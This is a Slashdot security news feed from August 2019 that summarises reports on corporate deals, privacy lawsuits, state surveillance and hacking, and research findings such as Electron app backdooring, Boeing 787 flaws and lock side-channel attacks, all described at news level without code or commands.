Slashdot security articles

Syndicate content Slashdot: Generated for TarPitt (217247)
News for nerds, stuff that matters: Generated for TarPitt (217247)
Updated: 2 hours 31 min ago

$10.7 Billion Broadcom-Symantec Enterprise Deal Creates Software Titan

Thu, 08/08/2019 - 13:25
An anonymous reader quotes a report from CRN: Broadcom has agreed to purchase Symantec's enterprise business in a massive $10.7 billion deal that will break up the world's largest pure-play cybersecurity vendor. The San Jose, Calif.-based semiconductor manufacturer said the monster acquisition is expected to drive $2 billion of revenue and $1.3 billion of EBITDA (earning before interest, taxation, depreciation, and amortization), as well as upwards of $1 billion of cost synergies in the year following close. The Symantec name will be sold to Broadcom as part of the transaction. The deal will bring Symantec's $2.5 billion enterprise unit together with the software capabilities inherited last year through its $19 billion acquisition of CA Technologies. Symantec's enterprise business includes its traditional strength around anti-virus and endpoint protection as well as the cloud security capabilities inherited through the 2016 acquisition of Blue Coat Systems. "Meanwhile, Symantec's consumer business -- which includes its legacy Norton anti-virus capabilities as well as its more recent acquisition of LifeLock -- will become a standalone company," the report adds. "Interim Symantec President and CEO Rick Hill said the remaining consumer business contributed 90 percent of the company's total operating income, and the company expects to be able to continue to grow revenue for its Norton LifeLock business in the mid-single digits going forward."

Facebook Loses Facial Recognition Technology Appeal, Must Face Class Action

Thu, 08/08/2019 - 11:40
In a landmark decision, the Ninth Circuit today ruled that Facebook must face a class action suit claiming that its facial recognition practices violated an Illinois biometric privacy law. From a report: A federal appeals court on Thursday rejected Facebook's effort to undo a class action lawsuit claiming that it illegally collected and stored biometric data for millions of users without their consent. The 3-0 decision from the 9th U.S. Circuit Court of Appeals in San Francisco exposes Facebook to billions of dollars in potential damages to the Illinois users who brought the case. It came as the social media company faces broad criticism from lawmakers and regulators over its privacy practices. Last month, Facebook agreed to pay a record $5 billion fine to settle a Federal Trade Commission data privacy probe. "This biometric data is so sensitive that if it is compromised, there is simply no recourse," Shawn Williams, a lawyer for plaintiffs in the class action, said in an interview. "It's not like a Social security card or credit card number where you can change the number. You can't change your face."

Kazakhstan Halts Introduction of Internet Surveillance System

Thu, 08/08/2019 - 08:40
Kazakhstan has halted the implementation of an internet surveillance system criticized by lawyers as illegal, with the government describing its initial rollout as a test. From a report: Mobile phone operators in the oil-rich Central Asian nation's capital, Nur-Sultan, had asked customers to install an encryption certificate on their devices or risk losing internet access. State security officials said its goal was to protect Kazakh users from "hacker attacks, online fraud and other kinds of cyber threats." The certificate allowed users' traffic to be intercepted by the government, circumventing encryption used by email and messaging applications. Several Kazakh lawyers said this week they had sued the country's three mobile operators, arguing that restricting internet access to those who refused to install the certificate would be illegal. But late on Tuesday, Kazakhstan's State Security Committee said in a statement that the certificate rollout was simply a test which has now been completed. Users can remove the certificate and use internet as usual, it said.

WordPress Team Working on Daring Plan To Forcibly Update Old Websites

Thu, 08/08/2019 - 07:24
The developers behind the WordPress open-source content management system (CMS) are working on a plan to forcibly auto-update older versions of the CMS to more recent releases. From a report: The goal of this plan is to improve the security of the WordPress ecosystem, and the internet as a whole, since WordPress installations account for more than 34% of all internet websites. Officially supported versions include only the last six WordPress major releases, which currently are all the versions between v4.7 and v5.2. The plan is to slowly auto-update old WordPress sites, starting with v3.7, to the current minimum supported version, which is the v4.7 release. The WordPress team said it plans to monitor this tiered forced auto-update process for errors and site breakage. If there's something massively wrong, then auto-update can be stopped altogether. If only a few individual sites break, than those site will be rolled back to their previous versions and the owner will be notified via email.

Broadcom Close To Buying Symantec's Enterprise Business

Thu, 08/08/2019 - 05:00
phalse phace writes: Broadcom's on-again, off-again talks to buy Symantec are on again, but this time Broadcom is just interested in Symantec's Enterprise Business. According to the Wall Street Journal: "Broadcom is nearing a deal to buy Symantec's enterprise business after its attempted purchase of the entire cybersecurity firm fell apart. A deal for the Symantec business could be announced as early as Thursday, when Symantec reports its results, according to people familiar with the matter. The deal could value the Symantec division at around $10 billion, one of the people said. Broadcom had previously been in late-stage discussions to buy all of Symantec before the talks collapsed last month. Since then, the two sides have restarted discussions, with Broadcom zeroing in on the Symantec business that serves businesses and accounts for roughly half its $5 billion in annual revenue. The consumer segment accounts for the rest. The deal would be big for Symantec. Its entire market value is about $12.6 billion -- it has more than $2 billion of net debt -- compared with about $107.6 billion for Broadcom." UPDATE: It's official, Broadcom is acquiring Symantec's Enterprise Business for $10.7 billion.

Skype, Slack, Other Electron-Based Apps Can Be Easily Backdoored

Wed, 08/07/2019 - 19:30
An anonymous reader quotes a report from Ars Technica: The Electron development platform is a key part of many applications, thanks to its cross-platform capabilities. Based on JavaScript and Node.js, Electron has been used to create client applications for Internet communications tools (including Skype, WhatsApp, and Slack) and even Microsoft's Visual Studio Code development tool. But Electron can also pose a significant security risk because of how easily Electron-based applications can be modified without triggering warnings. At the BSides LV security conference on Tuesday, Pavel Tsakalidis demonstrated a tool he created called BEEMKA, a Python-based tool that allows someone to unpack Electron ASAR archive files and inject new code into Electron's JavaScript libraries and built-in Chrome browser extensions. The vulnerability is not part of the applications themselves but of the underlying Electron framework -- and that vulnerability allows malicious activities to be hidden within processes that appear to be benign. Tsakalidis said that he had contacted Electron about the vulnerability but that he had gotten no response -- and the vulnerability remains. While making these changes required administrator access on Linux and MacOS, it only requires local access on Windows. Those modifications can create new event-based "features" that can access the file system, activate a Web cam, and exfiltrate information from systems using the functionality of trusted applications -- including user credentials and sensitive data. In his demonstration, Tsakalidis showed a backdoored version of Microsoft Visual Studio Code that sent the contents of every code tab opened to a remote website. The problem lies in the fact that Electron ASAR files themselves are not encrypted or signed, allowing them to be modified without changing the signature of the affected applications. A request from developers to be able to encrypt ASAR files was closed by the Electron team without action.

Google Pixel 4 Will Have 90Hz 'Smooth Display and DSLR Camera Attachment

Wed, 08/07/2019 - 17:45
According to 9to5Google, Google's upcoming Pixel 4 and Pixel 4 XL smartphones will feature 90Hz refresh rates, 6GB of RAM, and a DSLR attachment, among other features not reported until now. From the report: First, the basics: There will be a Pixel 4 and Pixel 4 XL, and they will both more or less have the same features. They are phones. As we've already seen, they will have glass on the front and back, and a large camera bump. The have a sizable top bezel on the front housing the Soli radar chip, the speaker, a single front shooter, and the suite of sensors for face unlock. Other familiar aesthetic flourishes like a colored lock button and the usual 'G' logo on the back are also in tow. Things get a little interesting with the display specs. Pixel 4 and Pixel 4 XL will have 5.7-inch and 6.3-inch OLED displays, respectively -- the smaller is Full HD+, while the larger is Quad HD+. We can confirm now, though, that both will be 90 Hz displays, a feature Google is planning to call "Smooth Display." We also have word on the Pixel 4 and Pixel 4 XL camera specs. There are two sensors on the rear, one of which is a 12MP shooter with phase-detect auto-focus. Also, confirming details that we unearthed in the Google Camera app, the other rear sensor on the Google Pixel 4 and Pixel 4 XL is a 16MP telephoto lens. Another interesting tidbit on the camera side: We're told Google is developing a DSLR-like attachment for the Pixel 4 that may become an available accessory. In other Pixel 4 specs, the smaller 5.7-inch Google Pixel 4 will have a 2,800 mAh battery, while the larger model will have a 3,700 mAh battery. That means, compared to last year, the smaller Pixel will have a slightly smaller battery (down from 2,915 mAh), while the larger Pixel will have a notably beefier one (up from 3,430 mAh). Both devices will pack the Snapdragon 855, get an appreciated bump to 6GB of RAM, and will be available in both 64GB and 128GB variants in the United States. Finally, we can confirm that both Pixel 4 models will have stereo speakers, the Titan M security module that was introduced with the Pixel 3, and of course, the latest version of Android with 3 years of software support. We're also told to expect that, like previous years, Google will show off some new Assistant features that will be exclusive to Pixel 4.

Twitter Fesses Up To More Adtech Leaks

Wed, 08/07/2019 - 16:03
Twitter has disclosed more bugs related to how it uses personal data for ad targeting that means it may have shared users data with advertising partners even when a user had expressly told it not to. TechCrunch reports: Back in May the social network disclosed a bug that in certain conditions resulted in an account's location data being shared with a Twitter ad partner, during real-time bidding (RTB) auctions. In a blog post on its Help Center about the latest "issues" Twitter says it "recently" found, it admits to finding two problems with users' ad settings choices that mean they "may not have worked as intended." It claims both problems were fixed on August 5. Though it does not specify when it realized it was processing user data without their consent. The first bug relates to tracking ad conversions. This meant that if a Twitter user clicked or viewed an ad for a mobile application on the platform and subsequently interacted with the mobile app Twitter says it "may have shared certain data (e.g., country code; if you engaged with the ad and when; information about the ad, etc)" with its ad measurement and advertising partners -- regardless of whether the user had agreed their personal data could be shared in this way. It suggests this leak of data has been happening since May 2018 -- which is also the day when Europe's updated privacy framework, GDPR, came into force. Twitter specifies that it does not share users' names, Twitter handles, email or phone number with ad partners. However it does share a user's mobile device identifier, which GDPR treats as personal data as it acts as a unique identifier. The second issue Twitter discloses in the blog post also relates to tracking users' wider web browsing to serve them targeted ads. Here Twitter admits that, since September 2018, it may have served targeted ads that used inferences made about the user's interests based on tracking their wider use of the Internet -- even when the user had not given permission to be tracked.

A Boeing Code Leak Exposes Security Flaws Deep In a 787's Guts

Wed, 08/07/2019 - 14:40
An anonymous reader quotes a report from Wired: Late one night last September, security researcher Ruben Santamarta sat in his home office in Madrid and partook in some creative googling, searching for technical documents related to his years-long obsession: the cybersecurity of airplanes. He was surprised to discover a fully unprotected server on Boeing's network, seemingly full of code designed to run on the company's giant 737 and 787 passenger jets, left publicly accessible and open to anyone who found it. So he downloaded everything he could see. Now, nearly a year later, Santamarta claims that leaked code has led him to something unprecedented: security flaws in one of the 787 Dreamliner's components, deep in the plane's multi-tiered network. He suggests that for a hacker, exploiting those bugs could represent one step in a multistage attack that starts in the plane's in-flight entertainment system and extends to highly protected, safety-critical systems like flight controls and sensors. At the Black Hat security conference today in Las Vegas, Santamarta, a researcher for security firm IOActive, plans to present his findings, including the details of multiple serious security flaws in the code for a component of the 787 known as a Crew Information Service/Maintenance System. The CIS/MS is responsible for applications like maintenance systems and the so-called electronic flight bag, a collection of navigation documents and manuals used by pilots. Santamarta says he found a slew of memory corruption vulnerabilities in that CIS/MS, and he claims that a hacker could use those flaws as a foothold inside a restricted part of a plane's network. An attacker could potentially pivot, Santamarta says, from the in-flight entertainment system to the CIS/MS to send commands to far more sensitive components that control the plane's safety-critical systems, including its engine, brakes, and sensors. Boeing maintains that other security barriers in the 787's network architecture would make that progression impossible. Boeing said in a statement that it had investigated IOActive's claims and concluded that they don't represent any real threat of a cyberattack. "IOActive's scenarios cannot affect any critical or essential airplane system and do not describe a way for remote attackers to access important 787 systems like the avionics system," the company's statement reads. "IOActive reviewed only one part of the 787 network using rudimentary tools, and had no access to the larger system or working environments. IOActive chose to ignore our verified results and limitations in its research, and instead made provocative statements as if they had access to and analyzed the working system. While we appreciate responsible engagement from independent cybersecurity researchers, we're disappointed in IOActive's irresponsible presentation." Boeing says the company put an actual Boeing 787 in "flight mode" to test and try to exploit the vulnerabilities. They found that they couldn't carry out a successful attack.

With Warshipping, Hackers Ship Their Exploits Directly To Their Target's Mail Room

Wed, 08/07/2019 - 13:25
Why break into a company's network when you can just walk right in-- literally? From a report: Gone could be the days of having to find a zero-day vulnerability in a target's website, or having to scramble for breached usernames and passwords to break through a company's login pages. And certainly there will be no need to park outside a building and brute-force the Wi-Fi network password. Just drop your exploit in the mail and let your friendly postal worker deliver it to your target's door. This newly named technique -- dubbed "warshipping" -- is not a new concept. Just think of the traditional Trojan horse rolling into the city of Troy, or when hackers drove up to TJX stores and stole customer data by breaking into the store's Wi-Fi network. But security researchers at IBM's X-Force Red say it's a novel and effective way for an attacker to gain an initial foothold on a target's network. "It uses disposable, low cost and low power computers to remotely perform close-proximity attacks, regardless of the cyber criminal's location," wrote Charles Henderson, who heads up the IBM offensive operations unit.

North Korea Took $2 Billion in Cyberattacks To Fund Weapons Program

Wed, 08/07/2019 - 12:05
An anonymous reader shares a report: North Korea has generated an estimated $2 billion for its weapons of mass destruction programs using "widespread and increasingly sophisticated" cyberattacks to steal from banks and cryptocurrency exchanges, according to a confidential U.N. report seen by Reuters on Monday. Pyongyang also "continued to enhance its nuclear and missile programmes although it did not conduct a nuclear test or ICBM (Intercontinental Ballistic Missile) launch," said the report to the U.N. Security Council North Korea sanctions committee by independent experts monitoring compliance over the past six months. The experts said North Korea "used cyberspace to launch increasingly sophisticated attacks to steal funds from financial institutions and cryptocurrency exchanges to generate income." They also used cyberspace to launder the stolen money, the report said.

High-Security Locks For Government and Banks Hacked By Researcher

Tue, 08/06/2019 - 17:25
pgmrdlm shares a report from Reuters: Hackers could crack open high-security electronic locks by monitoring their power, allowing thieves to steal cash in automated teller machines, narcotics in pharmacies and government secrets, according to research to be presented Friday at the annual Def Con hacking conference in Las Vegas. Mike Davis, a researcher with security firm IOActive, discovered the vulnerability last year and alerted government officials and Swiss company DormaKaba Holding, the distributor of multiple brands of locks at issue. In an interview with Reuters, Davis said he used an oscilloscope worth about $5,000 to detect small changes in the power consumption, through what is known as a side-channel attack. The method worked best in older models. The locks include their own power supply so they function even when an external source of electricity is cut off. Most versions do not consume extra or randomized power to hide what they are doing. That leaves them open to attack if a thief can get physically close enough and has the right tools, Davis said. "I can download that analog signal and parse through the power trace to get ones and zeroes," Davis said. "I know what the lock is doing internally." Inside ATMs, the company's locks typically protect the cash in the more secure, lower compartment. An upper compartment includes the interface with customers and directs the lower compartment to send up money. The upper compartment often has less physical security, and breaking into it might provide access to the lower vault's vulnerable lock. A bigger concern is that another series of DormaKaba locks are used on military bases, U.S. presidential jet Air Force One and elsewhere in the government.

Windows Defender Achieves 'Best Antivirus' Status

Tue, 08/06/2019 - 16:45
An anonymous reader quotes a report from PC Magazine: As Softpedia reports, the independent IT security institute AV-TEST spent May and June continuously evaluating 20 home user security products using their default settings to see which offered the best protection. Only four of those products achieved a top score, and one of them was Windows Defender. The other three are F-Secure SAFE 17, Kaspersky Internet Security 19.0, and Norton Security 22.17. The big difference between these and Windows Defender is the fact Microsoft includes Windows Defender for free with Windows 10, where as the others require a paid subscription to continue being fully-functional. "Of the other products evaluated, Webroot SecureAnywhere 9.0 came last," adds PC Magazine. "Those just missing out on the top score while still earning an AV-TEST 'Top Product' award include Avast Free AntiVirus 19.5, AVG Internet Security 19.5, Bitdefender Internet Security 23.0, Trend Micro Internet Security 15.0, and VIPRE AdvancedSecurity 11.0."

Google Expands its Advanced Protection Program To Chrome

Tue, 08/06/2019 - 16:07
Google is expanding its Advanced Protection Program to its Chrome browser. From a report: If you're an Advanced Protection Program user and you have sync turned on in Chrome, you will now automatically receive stronger protections against risky downloads. Google didn't go into much detail regarding the protections, likely not to publicly give away how they work. But the company did say that when users attempt to download "certain risky files," Chrome will now show additional warnings, or in some cases even block the downloads outright. The warnings are, however, only available in Chrome for Windows, Mac, and Linux. Google is not rolling out the Advanced Protection Program to Chrome for Android and iOS.

Final Red Hat Enterprise Linux 7 Version Released

Tue, 08/06/2019 - 13:20
The last RHEL release, RHEL 7.7, is now available for current Red Hat Enterprise Linux subscribers via the Red Hat Customer Portal. ZDNet reports on what's new: RHEL 7.7's most important updates are support for the latest generation of enterprise hardware and remediation for the recently disclosed ZombieLoad vulnerabilities. The latest RHEL 7 also includes network stack performance enhancements. With this release, you can offload virtual switching operations to network interface card (NIC) hardware. What that means for you is, if you're using virtual switching and network function virtualization (NFV), you'll see better network performance on cloud and container platforms such as Red Hat OpenStack Platform and Red Hat OpenShift. RHEL 7.7 users can also use Red Hat's new predictive problem shooter: Red Hat Insights. This uses a software-as-a-service (SaaS)-based predictive analytics approach to spot, assess, and mitigate potential problems to their systems before they can cause trouble. For developers, RHEL 7.7 comes with Python 3.6 interpreter, and the pip and setup tools utilities. Previously, Python 3 versions were available only as a part of Red Hat Software Collections. Moving on to the cloud, RHEL 7.7 Red Hat Image Builder is now supported. This feature, which is also in RHEL 8, enables you to easily create custom RHEL system images for cloud and virtualization platforms such as Amazon Web Services (AWS), VMware vSphere, and OpenStack. To help cloud-native developers, RHEL 7.7 includes full support for Red Hat's distributed-container toolkit -- buildah, podman, and skopeo -- on RHEL workstations. After building on the desktop, programmers can use Red Hat Universal Base Image to build, run, and manage containerized applications across the hybrid cloud.

China Warns India of 'Reverse Sanctions' if Huawei is Blocked

Tue, 08/06/2019 - 11:25
China has told India not to block its Huawei from doing business in the country, warning there could be consequences for Indian firms operating in China, Reuters reported on Tuesday, citing sources with knowledge of the matter said. From a report: India is due to hold trials for installing a next-generation 5G cellular network in the next few months, but has not yet taken a call on whether it would invite the Chinese telecoms equipment maker to take part, telecoms minister Ravi Shankar Prasad has said. Huawei, the world's biggest maker of such gear, is at the centre of a geopolitical tug-of-war between China and the United States. U.S. President Donald Trump's administration put the company on a blacklist in May, citing national security concerns. It has asked its allies not to use Huawei equipment, which it says China could exploit for spying.

AT&T Employees Took Bribes To Plant Malware on the Company's Network

Tue, 08/06/2019 - 07:28
AT&T employees took bribes to unlock millions of smartphones, and to install malware and unauthorized hardware on the company's network, the Department of Justice said yesterday. From a report: These details come from a DOJ case opened against Muhammad Fahd, a 34-year-old man from Pakistan, and his co-conspirator, Ghulam Jiwani, believed to be deceased. The DOJ charged the two with paying more than $1 million in bribes to several AT&T employees at the company's Mobility Customer Care call center in Bothell, Washington. The bribery scheme lasted from at least April 2012 until September 2017. Initially, the two Pakistani men bribed AT&T employees to unlock expensive iPhones so they could be used outside AT&T's network. The two recruited AT&T employees by approaching them in private via telephone or Facebook messages. Employees who agreed, received lists of IMEI phone codes which they had to unlock for sums of money. Employees would then receive bribes in their bank accounts, in shell companies they created, or as cash, from the two Pakistani men.

Democratic Senate Campaign Group Exposed 6.2 Million Americans' Emails

Tue, 08/06/2019 - 06:43
A political campaign group working to elect Democratic senators left a spreadsheet containing the email addresses of 6.2 million Americans' on an exposed server. From a report: Data breach researchers at security firm UpGuard found the data in late July, and traced the storage bucket back to a former staffer at the Democratic Senatorial Campaign Committee, an organization that seeks grassroots donations and contributions to help elect Democratic candidates to the U.S. Senate. Following the discovery, UpGuard researchers reached out to the DSCC and the storage bucket was secured within a few hours. The researchers published shared their findings exclusively with TechCrunch and published their findings. The spreadsheet was titled "EmailExcludeClinton.csv" and was found in a similarly named unprotected Amazon S3 bucket without a password. The file was uploaded in 2010 -- a year after former Democratic senator and presidential candidate Hillary Clinton, whom the data is believed to be named after, became secretary of state. UpGuard said the data may be of people "who had opted out or should otherwise be excludedâ from the committee's marketing.

Microsoft Catches Russian State Hackers Using IoT Devices To Breach Networks

Tue, 08/06/2019 - 05:00
An anonymous reader quotes a report from Ars Technica: Hackers working for the Russian government have been using printers, video decoders, and other so-called Internet-of-things devices as a beachhead to penetrate targeted computer networks, Microsoft officials warned on Monday. "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access," officials with the Microsoft Threat Intelligence Center wrote in a post. "Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data." Microsoft researchers discovered the attacks in April, when a voice-over-IP phone, an office printer, and a video decoder in multiple customer locations were communicating with servers belonging to "Strontium," a Russian government hacking group better known as Fancy Bear or APT28. In two cases, the passwords for the devices were the easily guessable default ones they shipped with. In the third instance, the device was running an old firmware version with a known vulnerability. While Microsoft officials concluded that Strontium was behind the attacks, they said they weren't able to determine what the group's ultimate objectives were. Microsoft says they have notified the makers of the targeted IoT devices so they can add new protections. "Monday's report also provided IP addresses and scripts organizations can use to detect if they have also been targeted or infected," adds Ars Technica. "Beyond that, Monday's report reminded people that, despite Strontium's above-average hacking abilities, an IoT device is often all it needs to gain access to a targeted network."

Amazon Is Coaching Cops On How To Obtain Surveillance Footage Without a Warrant

Mon, 08/05/2019 - 16:45
popcornfan679 shares a report from Motherboard: When police partner with Ring, Amazon's home surveillance camera company, they get access to the "Law Enforcement Neighborhood Portal," an interactive map that allows officers to request footage directly from camera owners. Police don't need a warrant to request this footage, but they do need permission from camera owners. Emails and documents obtained by Motherboard reveal that people aren't always willing to provide police with their Ring camera footage. However, Ring works with law enforcement and gives them advice on how to persuade people to give them footage. Emails obtained from police department in Maywood, NJ -- and emails from the police department of Bloomfield, NJ, which were also posted by Wired -- show that Ring coaches police on how to obtain footage. The company provides cops with templates for requesting footage, which they do not need a court warrant to do. Ring suggests cops post often on Neighbors, Ring's free "neighborhood watch" app, where Ring camera owners have the option of sharing their camera footage. As reported by GovTech on Friday, police can request Ring camera footage directly from Amazon, even if a Ring customer denies to provide police with the footage. It's a workaround that allows police to essentially "subpoena" anything captured on Ring cameras. Last week, Motherboard also found that at least 200 law enforcement agencies around the country have entered into partnerships with Amazon's home surveillance company Ring.